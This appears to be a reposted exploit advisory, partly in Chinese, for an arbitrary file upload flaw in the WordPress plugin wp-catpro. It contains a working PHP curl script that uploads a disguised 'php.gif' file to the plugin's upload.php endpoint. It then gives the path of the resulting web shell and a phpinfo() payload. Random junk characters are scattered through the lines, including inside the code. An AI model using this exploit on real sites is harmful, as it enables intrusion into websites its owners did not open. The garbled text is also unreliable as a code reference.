WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
8 }' x. [8 V9 M3 a# y) r2 V#-----------------------------------------------------------------------

作者  => Zikou-16
4 B1 m( N* {6 u( _8 B: [; R& @  s邮箱 => zikou16x@gmail.com
1 k. Y" x6 |$ \测试系统 : Windows 7 , Backtrack 5r3
( s$ Q" ?6 Y$ M8 Z1 k, v5 L下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
5 R- F0 L4 y4 j+ A  o####
" z6 g$ W9 }1 j. }, f
#=> Exploit 信息:
; V: g( [( z6 k4 p( f------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
+ u4 E# [- K; m------------------

#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
# S( _3 A" A) n) M& X  g) N$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
* x3 M; J) `3 m6 Y3 }9 Ucurl_setopt($ch, CURLOPT_POST, true);
, w# i  X4 ~! ^curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
2 ], W9 F; J! G. F  ?>
! U/ K1 ~& J9 V# R1 x<?php
phpinfo();
?>